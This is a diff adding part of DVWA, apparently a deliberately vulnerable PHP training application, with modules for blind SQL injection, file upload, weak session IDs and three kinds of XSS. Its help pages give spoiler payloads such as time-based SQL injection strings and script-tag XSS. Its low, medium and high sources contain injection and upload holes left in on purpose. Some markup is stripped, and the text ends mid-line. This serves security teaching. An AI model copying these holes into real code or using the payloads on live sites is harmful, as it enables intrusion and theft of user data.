    About

    +

    When an attacker executes SQL injection attacks, sometimes the server responds with error messages from the database server complaining that the SQL query's syntax is incorrect. + Blind SQL injection is identical to normal SQL Injection except that when an attacker attempts to exploit an application, rather then getting a useful error message, + they get a generic page specified by the developer instead. This makes exploiting a potential SQL Injection attack more difficult but not impossible. + An attacker can still steal data by asking a series of True and False questions through SQL statements, and monitoring how the web application response + (valid entry retunred or 404 header set).

    + +

    "time based" injection method is often used when there is no visible feedback in how the page different in its response (hence its a blind attack). + This means the attacker will wait to see how long the page takes to response back. If it takes longer than normal, their query was successful.

    + +

    + +

    Objective

    +

    Find the version of the SQL database software through a blind SQL attack.

    + +

    + +

    Low Level

    +

    The SQL query uses RAW input that is directly controlled by the attacker. All they need to-do is escape the query and then they are able + to execute any SQL query they wish.

    + 
    Spoiler: ?id=1' AND sleep 5&Submit=Submit.
    + +
    + +

    Medium Level

    +

    The medium level uses a form of SQL injection protection, with the function of + "". + However due to the SQL query not having quotes around the parameter, this will not fully protect the query from being altered.

    + +

    The text box has been replaced with a pre-defined dropdown list and uses POST to submit the form.

    + 
    Spoiler: ?id=1 AND sleep 3&Submit=Submit.
    + +
    + +

    High Level

    +

    This is very similar to the low level, however this time the attacker is inputting the value in a different manner. + The input values are being set on a different page, rather than a GET request.

    + 
    Spoiler: ID: 1' AND sleep 10&Submit=Submit.
+			Spoiler: Should be able to cut out the middle man..
    + +
    + +

    Impossible Level

    +

    The queries are now parameterized queries (rather than being dynamic). This means the query has been defined by the developer, + and has distinguish which sections are code, and the rest is data.

    +
    + +
    + +
    + +

    Reference:

    +
    diff --git a/DVWA/vulnerabilities/sqli_blind/index.php b/DVWA/vulnerabilities/sqli_blind/index.php new file mode 100644 index 00000000..5c4bfb5e --- /dev/null +++ b/DVWA/vulnerabilities/sqli_blind/index.php @@ -0,0 +1,97 @@ +The PHP function \"Magic Quotes\" is enabled."; +} +// Is PHP function safe_mode enabled? +if( ini_get( 'safe_mode' ) == true ) { + $WarningHtml .= "
    The PHP function \"Safe mode\" is enabled.
    "; +} + +$page[ 'body' ] .= " +
    +

    Vulnerability: SQL Injection (Blind)

    + + {$WarningHtml} + +
    "; +if( $vulnerabilityFile == 'high.php' ) { + $page[ 'body' ] .= "Click here to change your ID."; +} +else { + $page[ 'body' ] .= " +
    +

    + User ID:"; + if( $vulnerabilityFile == 'medium.php' ) { + $page[ 'body' ] .= "\n "; + } + else + $page[ 'body' ] .= "\n "; + + $page[ 'body' ] .= "\n +

    \n"; + + if( $vulnerabilityFile == 'impossible.php' ) + $page[ 'body' ] .= " " . tokenField(); + + $page[ 'body' ] .= " +
    "; +} +$page[ 'body' ] .= " + {$html} +
    + +

    More Information

    +
      +
    • " . dvwaExternalLinkUrlGet( 'https://en.wikipedia.org/wiki/SQL_injection' ) . "
      • +
    • " . dvwaExternalLinkUrlGet( 'https://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet' ) . "
      • +
    • " . dvwaExternalLinkUrlGet( 'https://owasp.org/www-community/attacks/Blind_SQL_Injection' ) . "
      • +
    • " . dvwaExternalLinkUrlGet( 'https://bobby-tables.com/' ) . "
      • +
    +
    \n"; + +dvwaHtmlEcho( $page ); + +?> diff --git a/DVWA/vulnerabilities/sqli_blind/source/high.php b/DVWA/vulnerabilities/sqli_blind/source/high.php new file mode 100644 index 00000000..985ac155 --- /dev/null +++ b/DVWA/vulnerabilities/sqli_blind/source/high.php @@ -0,0 +1,63 @@ + 0); // The '@' character suppresses errors + } catch(Exception $e) { + $exists = false; + } + } + + ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res); + break; + case SQLITE: + global $sqlite_db_connection; + + $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;"; + try { + $results = $sqlite_db_connection->query($query); + $row = $results->fetchArray(); + $exists = $row !== false; + } catch(Exception $e) { + $exists = false; + } + + break; + } + + if ($exists) { + // Feedback for end user + $html .= '
    User ID exists in the database.
    '; + } + else { + // Might sleep a random amount + if( rand( 0, 5 ) == 3 ) { + sleep( rand( 2, 4 ) ); + } + + // User wasn't found, so the page wasn't! + header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' ); + + // Feedback for end user + $html .= '
    User ID is MISSING from the database.
    '; + } +} + +?> diff --git a/DVWA/vulnerabilities/sqli_blind/source/impossible.php b/DVWA/vulnerabilities/sqli_blind/source/impossible.php new file mode 100644 index 00000000..67ba79c5 --- /dev/null +++ b/DVWA/vulnerabilities/sqli_blind/source/impossible.php @@ -0,0 +1,65 @@ +prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' ); + $data->bindParam( ':id', $id, PDO::PARAM_INT ); + $data->execute(); + + $exists = $data->rowCount(); + break; + case SQLITE: + global $sqlite_db_connection; + + $stmt = $sqlite_db_connection->prepare('SELECT COUNT(first_name) AS numrows FROM users WHERE user_id = :id LIMIT 1;' ); + $stmt->bindValue(':id',$id,SQLITE3_INTEGER); + $result = $stmt->execute(); + $result->finalize(); + if ($result !== false) { + // There is no way to get the number of rows returned + // This checks the number of columns (not rows) just + // as a precaution, but it won't stop someone dumping + // multiple rows and viewing them one at a time. + + $num_columns = $result->numColumns(); + if ($num_columns == 1) { + $row = $result->fetchArray(); + + $numrows = $row[ 'numrows' ]; + $exists = ($numrows == 1); + } + } + break; + } + + } + + // Get results + if ($exists) { + // Feedback for end user + $html .= '
    User ID exists in the database.
    '; + } else { + // User wasn't found, so the page wasn't! + header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' ); + + // Feedback for end user + $html .= '
    User ID is MISSING from the database.
    '; + } +} + +// Generate Anti-CSRF token +generateSessionToken(); + +?> diff --git a/DVWA/vulnerabilities/sqli_blind/source/low.php b/DVWA/vulnerabilities/sqli_blind/source/low.php new file mode 100644 index 00000000..dd04a8e8 --- /dev/null +++ b/DVWA/vulnerabilities/sqli_blind/source/low.php @@ -0,0 +1,57 @@ + 0); + } catch(Exception $e) { + $exists = false; + } + } + ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res); + break; + case SQLITE: + global $sqlite_db_connection; + + $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; + try { + $results = $sqlite_db_connection->query($query); + $row = $results->fetchArray(); + $exists = $row !== false; + } catch(Exception $e) { + $exists = false; + } + + break; + } + + if ($exists) { + // Feedback for end user + $html .= '
    User ID exists in the database.
    '; + } else { + // User wasn't found, so the page wasn't! + header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' ); + + // Feedback for end user + $html .= '
    User ID is MISSING from the database.
    '; + } + +} + +?> diff --git a/DVWA/vulnerabilities/sqli_blind/source/medium.php b/DVWA/vulnerabilities/sqli_blind/source/medium.php new file mode 100644 index 00000000..95b9a82a --- /dev/null +++ b/DVWA/vulnerabilities/sqli_blind/source/medium.php @@ -0,0 +1,54 @@ + 0); // The '@' character suppresses errors + } catch(Exception $e) { + $exists = false; + } + } + + break; + case SQLITE: + global $sqlite_db_connection; + + $query = "SELECT first_name, last_name FROM users WHERE user_id = $id;"; + try { + $results = $sqlite_db_connection->query($query); + $row = $results->fetchArray(); + $exists = $row !== false; + } catch(Exception $e) { + $exists = false; + } + break; + } + + if ($exists) { + // Feedback for end user + $html .= '
    User ID exists in the database.
    '; + } else { + // Feedback for end user + $html .= '
    User ID is MISSING from the database.
    '; + } +} + +?> diff --git a/DVWA/vulnerabilities/upload/help/help.php b/DVWA/vulnerabilities/upload/help/help.php new file mode 100644 index 00000000..9ef48a75 --- /dev/null +++ b/DVWA/vulnerabilities/upload/help/help.php @@ -0,0 +1,54 @@ +
    +

    Help - File Upload

    + +
    + + + + +
    +

    About

    +

    Uploaded files represent a significant risk to web applications. The first step in many attacks is to get some code to the system to be attacked. + Then the attacker only needs to find a way to get the code executed. Using a file upload helps the attacker accomplish the first step.

    + +

    The consequences of unrestricted file upload can vary, including complete system takeover, an overloaded file system, forwarding attacks to backend systems, + and simple defacement. It depends on what the application does with the uploaded file, including where it is stored.

    + +

    + +

    Objective

    +

    Execute any PHP function of your choosing on the target system (such as + or ) thanks to this file upload vulnerability.

    + +

    + +

    Low Level

    +

    Low level will not check the contents of the file being uploaded in any way. It relies only on trust.

    + 
    Spoiler: Upload any valid PHP file with command in it.
    + +
    + +

    Medium Level

    +

    When using the medium level, it will check the reported file type from the client when its being uploaded.

    + 
    Spoiler: Worth looking for any restrictions within any "hidden" form fields.
    + +
    + +

    High Level

    +

    Once the file has been received from the client, the server will try to resize any image that was included in the request.

    + 
    Spoiler: need to link in another vulnerability, such as file inclusion.
    + +
    + +

    Impossible Level

    +

    This will check everything from all the levels so far, as well then to re-encode the image. This will make a new image, therefor stripping + any "non-image" code (including metadata).

    +
    + +
    + +
    + +

    Reference:

    +
    + diff --git a/DVWA/vulnerabilities/upload/index.php b/DVWA/vulnerabilities/upload/index.php new file mode 100644 index 00000000..149ccec7 --- /dev/null +++ b/DVWA/vulnerabilities/upload/index.php @@ -0,0 +1,75 @@ +Incorrect folder permissions: {$PHPUploadPath}
    Folder is not writable."; +} +// Is PHP-GD installed? +if( ( !extension_loaded( 'gd' ) || !function_exists( 'gd_info' ) ) ) { + $WarningHtml .= "
    The PHP module GD is not installed.
    "; +} + +$page[ 'body' ] .= " +
    +

    Vulnerability: File Upload

    + + {$WarningHtml} + +
    +
    + + Choose an image to upload:

    +
    +
    + \n"; + +if( $vulnerabilityFile == 'impossible.php' ) + $page[ 'body' ] .= " " . tokenField(); + +$page[ 'body' ] .= " +
    + {$html} +
    + +

    More Information

    +
      +
    • " . dvwaExternalLinkUrlGet( 'https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload' ) . "
      • +
    • " . dvwaExternalLinkUrlGet( 'https://www.acunetix.com/websitesecurity/upload-forms-threat/' ) . "
      • +
    +
    "; + +dvwaHtmlEcho( $page ); + +?> diff --git a/DVWA/vulnerabilities/upload/source/high.php b/DVWA/vulnerabilities/upload/source/high.php new file mode 100644 index 00000000..7dfa80d2 --- /dev/null +++ b/DVWA/vulnerabilities/upload/source/high.php @@ -0,0 +1,35 @@ +Your image was not uploaded.'; + } + else { + // Yes! + $html .= "
    {$target_path} succesfully uploaded!
    "; + } + } + else { + // Invalid file + $html .= '
    Your image was not uploaded. We can only accept JPEG or PNG images.
    '; + } +} + +?> diff --git a/DVWA/vulnerabilities/upload/source/impossible.php b/DVWA/vulnerabilities/upload/source/impossible.php new file mode 100644 index 00000000..376f75aa --- /dev/null +++ b/DVWA/vulnerabilities/upload/source/impossible.php @@ -0,0 +1,62 @@ +{$target_file} succesfully uploaded!"; + } + else { + // No + $html .= '
    Your image was not uploaded.
    '; + } + + // Delete any temp files + if( file_exists( $temp_file ) ) + unlink( $temp_file ); + } + else { + // Invalid file + $html .= '
    Your image was not uploaded. We can only accept JPEG or PNG images.
    '; + } +} + +// Generate Anti-CSRF token +generateSessionToken(); + +?> diff --git a/DVWA/vulnerabilities/upload/source/low.php b/DVWA/vulnerabilities/upload/source/low.php new file mode 100644 index 00000000..85ffa081 --- /dev/null +++ b/DVWA/vulnerabilities/upload/source/low.php @@ -0,0 +1,19 @@ +Your image was not uploaded.'; + } + else { + // Yes! + $html .= "
    {$target_path} succesfully uploaded!
    "; + } +} + +?> diff --git a/DVWA/vulnerabilities/upload/source/medium.php b/DVWA/vulnerabilities/upload/source/medium.php new file mode 100644 index 00000000..bb902701 --- /dev/null +++ b/DVWA/vulnerabilities/upload/source/medium.php @@ -0,0 +1,33 @@ +Your image was not uploaded.'; + } + else { + // Yes! + $html .= "
    {$target_path} succesfully uploaded!
    "; + } + } + else { + // Invalid file + $html .= '
    Your image was not uploaded. We can only accept JPEG or PNG images.
    '; + } +} + +?> diff --git a/DVWA/vulnerabilities/view_help.php b/DVWA/vulnerabilities/view_help.php new file mode 100644 index 00000000..65236730 --- /dev/null +++ b/DVWA/vulnerabilities/view_help.php @@ -0,0 +1,40 @@ +' . file_get_contents( DVWA_WEB_PAGE_TO_ROOT . "vulnerabilities/{$id}/help/help.php" ) . '' . file_get_contents( DVWA_WEB_PAGE_TO_ROOT . "vulnerabilities/{$id}/help/help.{$locale}.php" ) . 'Not Found

    "; +} + +$page[ 'body' ] .= " + + + +
    + {$help} +
    \n"; + +dvwaHelpHtmlEcho( $page ); + +?> diff --git a/DVWA/vulnerabilities/view_source.php b/DVWA/vulnerabilities/view_source.php new file mode 100644 index 00000000..16c99cd3 --- /dev/null +++ b/DVWA/vulnerabilities/view_source.php @@ -0,0 +1,103 @@ +vulnerabilities/{$id}/source/{$security}.js +
    + + + + +
    " . highlight_string( $js_source, true ) . "
    +
    + "; + } + + $page[ 'body' ] .= " +
    +

    {$vuln} Source

    + +

    vulnerabilities/{$id}/source/{$security}.php

    +
    + + + + +
    " . highlight_string( $source, true ) . "
    +
    + {$js_html} +

    + +
    + +
    +
    \n"; +} else { + $page['body'] = "

    Not found

    "; +} + +dvwaSourceHtmlEcho( $page ); + +?> diff --git a/DVWA/vulnerabilities/view_source_all.php b/DVWA/vulnerabilities/view_source_all.php new file mode 100644 index 00000000..876de367 --- /dev/null +++ b/DVWA/vulnerabilities/view_source_all.php @@ -0,0 +1,122 @@ + +

    {$vuln}

    +
    + +

    Impossible {$vuln} Source

    + + + + +
    {$impsrc}
    +
    + +

    High {$vuln} Source

    + + + + +
    {$highsrc}
    +
    + +

    Medium {$vuln} Source

    + + + + +
    {$medsrc}
    +
    + +

    Low {$vuln} Source

    + + + + +
    {$lowsrc}
    +

    + +
    + +
    + + \n"; +} else { + $page['body'] = "

    Not found

    "; +} + +dvwaSourceHtmlEcho( $page ); + +?> diff --git a/DVWA/vulnerabilities/weak_id/help/help.php b/DVWA/vulnerabilities/weak_id/help/help.php new file mode 100644 index 00000000..e0087f41 --- /dev/null +++ b/DVWA/vulnerabilities/weak_id/help/help.php @@ -0,0 +1,40 @@ +
    +

    Help - Weak Session IDs

    + +
    + + + + +
    +

    About

    +

    Knowledge of a session ID is often the only thing required to access a site as a specific user after they have logged in, if that session ID is able to be calculated or easily guessed, then an attacker will have an easy way to gain access to user accounts without having to brute force passwords or find other vulnerabilities such as Cross-Site Scripting.

    + +

    + +

    Objective

    +

    This module uses four different ways to set the dvwaSession cookie value, the objective of each level is to work out how the ID is generated and then infer the IDs of other system users.

    + +

    + +

    Low Level

    +

    The cookie value should be very obviously predictable.

    + +

    Medium Level

    +

    The value looks a little more random than on low but if you collect a few you should start to see a pattern.

    + +

    High Level

    +

    First work out what format the value is in and then try to work out what is being used as the input to generate the values.

    +

    Extra flags are also being added to the cookie, this does not affect the challenge but highlights extra protections that can be added to protect the cookies.

    + + +

    Impossible Level

    +

    The cookie value should not be predictable at this level but feel free to try.

    +

    As well as the extra flags, the cookie is being tied to the domain and the path of the challenge.

    +
    + +
    + +

    Reference:

    +

    Reference:

    +
    diff --git a/DVWA/vulnerabilities/weak_id/index.php b/DVWA/vulnerabilities/weak_id/index.php new file mode 100644 index 00000000..72dc94cd --- /dev/null +++ b/DVWA/vulnerabilities/weak_id/index.php @@ -0,0 +1,61 @@ + +

    Vulnerability: Weak Session IDs

    +

    + This page will set a new cookie called dvwaSession each time the button is clicked.
    +

    +
    + +
    + +$html + +EOF; + +/* +Maybe display this, don't think it is needed though +if (isset ($cookie_value)) { + $page[ 'body' ] .= << diff --git a/DVWA/vulnerabilities/weak_id/source/high.php b/DVWA/vulnerabilities/weak_id/source/high.php new file mode 100644 index 00000000..7740434d --- /dev/null +++ b/DVWA/vulnerabilities/weak_id/source/high.php @@ -0,0 +1,14 @@ + diff --git a/DVWA/vulnerabilities/weak_id/source/impossible.php b/DVWA/vulnerabilities/weak_id/source/impossible.php new file mode 100644 index 00000000..28f39ccc --- /dev/null +++ b/DVWA/vulnerabilities/weak_id/source/impossible.php @@ -0,0 +1,9 @@ + diff --git a/DVWA/vulnerabilities/weak_id/source/low.php b/DVWA/vulnerabilities/weak_id/source/low.php new file mode 100644 index 00000000..20a9ae68 --- /dev/null +++ b/DVWA/vulnerabilities/weak_id/source/low.php @@ -0,0 +1,13 @@ + diff --git a/DVWA/vulnerabilities/weak_id/source/medium.php b/DVWA/vulnerabilities/weak_id/source/medium.php new file mode 100644 index 00000000..c19212c7 --- /dev/null +++ b/DVWA/vulnerabilities/weak_id/source/medium.php @@ -0,0 +1,9 @@ + diff --git a/DVWA/vulnerabilities/xss_d/help/help.php b/DVWA/vulnerabilities/xss_d/help/help.php new file mode 100644 index 00000000..df4a53bf --- /dev/null +++ b/DVWA/vulnerabilities/xss_d/help/help.php @@ -0,0 +1,58 @@ +
    +

    Help - Cross Site Scripting (DOM Based)

    + +
    + + + + +
    +

    About

    +

    "Cross-Site Scripting (XSS)" attacks are a type of injection problem, in which malicious scripts are injected into the otherwise benign and trusted web sites. + XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, + to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application using input from a user in the output, + without validating or encoding it.

    + +

    An attacker can use XSS to send a malicious script to an unsuspecting user. The end user's browser has no way to know that the script should not be trusted, + and will execute the JavaScript. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other + sensitive information retained by your browser and used with that site. These scripts can even rewrite the content of the HTML page.

    + +

    DOM Based XSS is a special case of reflected where the JavaScript is hidden in the URL and pulled out by JavaScript in the page while it is rendering rather than being embedded in the page when it is served. This can make it stealthier than other attacks and WAFs or other protections which are reading the page body do not see any malicious content.

    + +

    + +

    Objective

    +

    Run your own JavaScript in another user's browser, use this to steal the cookie of a logged in user.

    + +

    + +

    Low Level

    +

    Low level will not check the requested input, before including it to be used in the output text.

    + 
    Spoiler: alert(1)")?>.
    + +


    + +

    Medium Level

    +

    The developer has tried to add a simple pattern matching to remove any references to "<script" to disable any JavaScript. Find a way to run JavaScript without using the script tags.

    + 
    Spoiler: You must first break out of the select block then you can add an image with an onerror event:
    
+/option>");?>    .
    + +


    + +

    High Level

    +

    The developer is now white listing only the allowed languages, you must find a way to run your code without it going to the server.

    + 
    Spoiler: The fragment section of a URL (anything after the # symbol) does not get sent to the server and so cannot be blocked. The bad JavaScript being used to render the page reads the content from it when creating the page.
    
+alert(1)")?>    .
    + +


    + +

    Impossible Level

    +

    The contents taken from the URL are encoded by default by most browsers which prevents any injected JavaScript from being executed.

    +
    + +
    + +
    + +

    Reference:

    +
    diff --git a/DVWA/vulnerabilities/xss_d/index.php b/DVWA/vulnerabilities/xss_d/index.php new file mode 100644 index 00000000..955b1a70 --- /dev/null +++ b/DVWA/vulnerabilities/xss_d/index.php @@ -0,0 +1,79 @@ + +

    Vulnerability: DOM Based Cross Site Scripting (XSS)

    + +
    + +

    Please choose a language:

    + +
    + + +
    +
    +EOF; + +$page[ 'body' ] .= " +

    More Information

    +
      +
    • " . dvwaExternalLinkUrlGet( 'https://owasp.org/www-community/attacks/xss/' ) . "
      • +
    • " . dvwaExternalLinkUrlGet( 'https://owasp.org/www-community/attacks/DOM_Based_XSS' ) . "
      • +
    • " . dvwaExternalLinkUrlGet( 'https://www.acunetix.com/blog/articles/dom-xss-explained/' ) . "
      • +
    +\n"; + +dvwaHtmlEcho( $page ); + +?> diff --git a/DVWA/vulnerabilities/xss_d/source/high.php b/DVWA/vulnerabilities/xss_d/source/high.php new file mode 100644 index 00000000..dd5416cb --- /dev/null +++ b/DVWA/vulnerabilities/xss_d/source/high.php @@ -0,0 +1,20 @@ + diff --git a/DVWA/vulnerabilities/xss_d/source/impossible.php b/DVWA/vulnerabilities/xss_d/source/impossible.php new file mode 100644 index 00000000..8900c0ee --- /dev/null +++ b/DVWA/vulnerabilities/xss_d/source/impossible.php @@ -0,0 +1,5 @@ + diff --git a/DVWA/vulnerabilities/xss_d/source/low.php b/DVWA/vulnerabilities/xss_d/source/low.php new file mode 100644 index 00000000..3fab08dd --- /dev/null +++ b/DVWA/vulnerabilities/xss_d/source/low.php @@ -0,0 +1,5 @@ + diff --git a/DVWA/vulnerabilities/xss_d/source/medium.php b/DVWA/vulnerabilities/xss_d/source/medium.php new file mode 100644 index 00000000..fd719ad1 --- /dev/null +++ b/DVWA/vulnerabilities/xss_d/source/medium.php @@ -0,0 +1,14 @@ + diff --git a/DVWA/vulnerabilities/xss_r/help/help.php b/DVWA/vulnerabilities/xss_r/help/help.php new file mode 100644 index 00000000..4f82bc61 --- /dev/null +++ b/DVWA/vulnerabilities/xss_r/help/help.php @@ -0,0 +1,57 @@ +
    +

    Help - Cross Site Scripting (Reflected)

    + +
    + + + + +
    +

    About

    +

    "Cross-Site Scripting (XSS)" attacks are a type of injection problem, in which malicious scripts are injected into the otherwise benign and trusted web sites. + XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, + to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application using input from a user in the output, + without validating or encoding it.

    + +

    An attacker can use XSS to send a malicious script to an unsuspecting user. The end user's browser has no way to know that the script should not be trusted, + and will execute the JavaScript. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other + sensitive information retained by your browser and used with that site. These scripts can even rewrite the content of the HTML page.

    + +

    Because its a reflected XSS, the malicious code is not stored in the remote web application, so requires some social engineering (such as a link via email/chat).

    + +

    + +

    Objective

    +

    One way or another, steal the cookie of a logged in user.

    + +

    + +

    Low Level

    +

    Low level will not check the requested input, before including it to be used in the output text.

    + 
    Spoiler: ?name=<script>alert("XSS");</script>.
    + +
    + +

    Medium Level

    +

    The developer has tried to add a simple pattern matching to remove any references to "<script>", to disable any JavaScript.

    + 
    Spoiler: Its cAse sENSiTiVE.
    + +
    + +

    High Level

    +

    The developer now believes they can disable all JavaScript by removing the pattern "<s*c*r*i*p*t".

    + 
    Spoiler: HTML events.
    + +
    + +

    Impossible Level

    +

    Using inbuilt PHP functions (such as ""), + its possible to escape any values which would alter the behaviour of the input.

    +
    + +
    + +
    + +

    Reference:

    +
    diff --git a/DVWA/vulnerabilities/xss_r/index.php b/DVWA/vulnerabilities/xss_r/index.php new file mode 100644 index 00000000..76749c20 --- /dev/null +++ b/DVWA/vulnerabilities/xss_r/index.php @@ -0,0 +1,66 @@ + +

    Vulnerability: Reflected Cross Site Scripting (XSS)

    + +
    +
    +

    + What's your name? + + +

    \n"; + +if( $vulnerabilityFile == 'impossible.php' ) + $page[ 'body' ] .= " " . tokenField(); + +$page[ 'body' ] .= " +
    + {$html} +
    + +

    More Information

    +
      +
    • " . dvwaExternalLinkUrlGet( 'https://owasp.org/www-community/attacks/xss/' ) . "
      • +
    • " . dvwaExternalLinkUrlGet( 'https://owasp.org/www-community/xss-filter-evasion-cheatsheet' ) . "
      • +
    • " . dvwaExternalLinkUrlGet( 'https://en.wikipedia.org/wiki/Cross-site_scripting' ) . "
      • +
    • " . dvwaExternalLinkUrlGet( 'https://www.cgisecurity.com/xss-faq.html' ) . "
      • +
    • " . dvwaExternalLinkUrlGet( 'https://www.scriptalert1.com/' ) . "
      • +
    +\n"; + +dvwaHtmlEcho( $page ); + +?> diff --git a/DVWA/vulnerabilities/xss_r/source/high.php b/DVWA/vulnerabilities/xss_r/source/high.php new file mode 100644 index 00000000..a3983625 --- /dev/null +++ b/DVWA/vulnerabilities/xss_r/source/high.php @@ -0,0 +1,14 @@ +Hello {$name}"; +} + +?> diff --git a/DVWA/vulnerabilities/xss_r/source/impossible.php b/DVWA/vulnerabilities/xss_r/source/impossible.php new file mode 100644 index 00000000..34f35c26 --- /dev/null +++ b/DVWA/vulnerabilities/xss_r/source/impossible.php @@ -0,0 +1,18 @@ +Hello {$name}"; +} + +// Generate Anti-CSRF token +generateSessionToken(); + +?> diff --git a/DVWA/vulnerabilities/xss_r/source/low.php b/DVWA/vulnerabilities/xss_r/source/low.php new file mode 100644 index 00000000..1cbeba4b --- /dev/null +++ b/DVWA/vulnerabilities/xss_r/source/low.php @@ -0,0 +1,11 @@ +Hello ' . $_GET[ 'name' ] . ''; +} + +?> diff --git a/DVWA/vulnerabilities/xss_r/source/medium.php b/DVWA/vulnerabilities/xss_r/source/medium.php new file mode 100644 index 00000000..63a305ba --- /dev/null +++ b/DVWA/vulnerabilities/xss_r/source/medium.php @@ -0,0 +1,14 @@ +', '', $_GET[ 'name' ] ); + + // Feedback for end user + $html .= "
    Hello {$name}
    "; +} + +?> diff --git a/DVWA/vulnerabilities/xss_s/help/help.php b/DVWA/vulnerabilities/xss_s/help/help.php new file mode 100644 index 00000000..0bfd3b2e --- /dev/null +++ b/DVWA/vulnerabilities/xss_s/help/help.php @@ -0,0 +1,56 @@ +
    +

    Help - Cross Site Scripting (Stored)

    + +
    + + + + +
    +

    "Cross-Site Scripting (XSS)" attacks are a type of injection problem, in which malicious scripts are injected into the otherwise benign and trusted web sites. + XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, + to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application using input from a user in the output, + without validating or encoding it.

    + +

    An attacker can use XSS to send a malicious script to an unsuspecting user. The end user's browser has no way to know that the script should not be trusted, + and will execute the JavaScript. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other + sensitive information retained by your browser and used with that site. These scripts can even rewrite the content of the HTML page.

    + +

    The XSS is stored in the database. The XSS is permanent, until the database is reset or the payload is manually deleted.

    + +

    + +

    Objective

    +

    Redirect everyone to a web page of your choosing.

    + +

    + +

    Low Level

    +

    Low level will not check the requested input, before including it to be used in the output text.

    + 
    Spoiler: Either name or message field: <script>alert("XSS");</script>.
    + +
    + +

    Medium Level

    +

    The developer had added some protection, however hasn't done every field the same way.

    + 
    Spoiler: name field: <sCriPt>alert("XSS");</sCriPt>.
    + +
    + +

    High Level

    +

    The developer believe they have disabled all script usage by removing the pattern "<s*c*r*i*p*t".

    + 
    Spoiler: HTML events.
    + +
    + +

    Impossible Level

    +

    Using inbuilt PHP functions (such as ""), + its possible to escape any values which would alter the behaviour of the input.

    +
    + +
    + +
    + +

    Reference:

    +
    diff --git a/DVWA/vulnerabilities/xss_s/index.php b/DVWA/vulnerabilities/xss_s/index.php new file mode 100644 index 00000000..59afba68 --- /dev/null +++ b/DVWA/vulnerabilities/xss_s/index.php @@ -0,0 +1,87 @@ +' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '' ); +} + +$vulnerabilityFile = ''; +switch( dvwaSecurityLevelGet() ) { + case 'low': + $vulnerabilityFile = 'low.php'; + break; + case 'medium': + $vulnerabilityFile = 'medium.php'; + break; + case 'high': + $vulnerabilityFile = 'high.php'; + break; + default: + $vulnerabilityFile = 'impossible.php'; + break; +} + +require_once DVWA_WEB_PAGE_TO_ROOT . "vulnerabilities/xss_s/source/{$vulnerabilityFile}"; + +$page[ 'body' ] .= " +
    +

    Vulnerability: Stored Cross Site Scripting (XSS)

    + +
    +
    + + + + + + + + + + + + + +
    Name *
    Message *
      + + +
    \n"; + +if( $vulnerabilityFile == 'impossible.php' ) + $page[ 'body' ] .= " " . tokenField(); + +$page[ 'body' ] .= " +
    + {$html} +
    +
    + + " . dvwaGuestbook() . " +
    + +

    More Information

    +
      +
    • " . dvwaExternalLinkUrlGet( 'https://owasp.org/www-community/attacks/xss' ) . "
      • +
    • " . dvwaExternalLinkUrlGet( 'https://owasp.org/www-community/xss-filter-evasion-cheatsheet' ) . "
      • +
    • " . dvwaExternalLinkUrlGet( 'https://en.wikipedia.org/wiki/Cross-site_scripting' ) . "
      • +
    • " . dvwaExternalLinkUrlGet( 'https://www.cgisecurity.com/xss-faq.html' ) . "
      • +
    • " . dvwaExternalLinkUrlGet( 'https://www.scriptalert1.com/' ) . "
      • +
    +
    \n"; + +dvwaHtmlEcho( $page ); + +?> diff --git a/DVWA/vulnerabilities/xss_s/source/high.php b/DVWA/vulnerabilities/xss_s/source/high.php new file mode 100644 index 00000000..00ee1007 --- /dev/null +++ b/DVWA/vulnerabilities/xss_s/source/high.php @@ -0,0 +1,24 @@ +' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '' ); + + //mysql_close(); +} + +?> diff --git a/DVWA/vulnerabilities/xss_s/source/impossible.php b/DVWA/vulnerabilities/xss_s/source/impossible.php new file mode 100644 index 00000000..9cf3f077 --- /dev/null +++ b/DVWA/vulnerabilities/xss_s/source/impossible.php @@ -0,0 +1,31 @@ +prepare( 'INSERT INTO guestbook ( comment, name ) VALUES ( :message, :name );' ); + $data->bindParam( ':message', $message, PDO::PARAM_STR ); + $data->bindParam( ':name', $name, PDO::PARAM_STR ); + $data->execute(); +} + +// Generate Anti-CSRF token +generateSessionToken(); + +?> diff --git a/DVWA/vulnerabilities/xss_s/source/low.php b/DVWA/vulnerabilities/xss_s/source/low.php new file mode 100644 index 00000000..94ff4b45 --- /dev/null +++ b/DVWA/vulnerabilities/xss_s/source/low.php @@ -0,0 +1,22 @@ +' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '' ); + + //mysql_close(); +} + +?> diff --git a/DVWA/vulnerabilities/xss_s/source/medium.php b/DVWA/vulnerabilities/xss_s/source/medium.php new file mode 100644 index 00000000..cccefa31 --- /dev/null +++ b/DVWA/vulnerabilities/xss_s/source/medium.php @@ -0,0 +1,24 @@ +', '', $name ); + $name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? 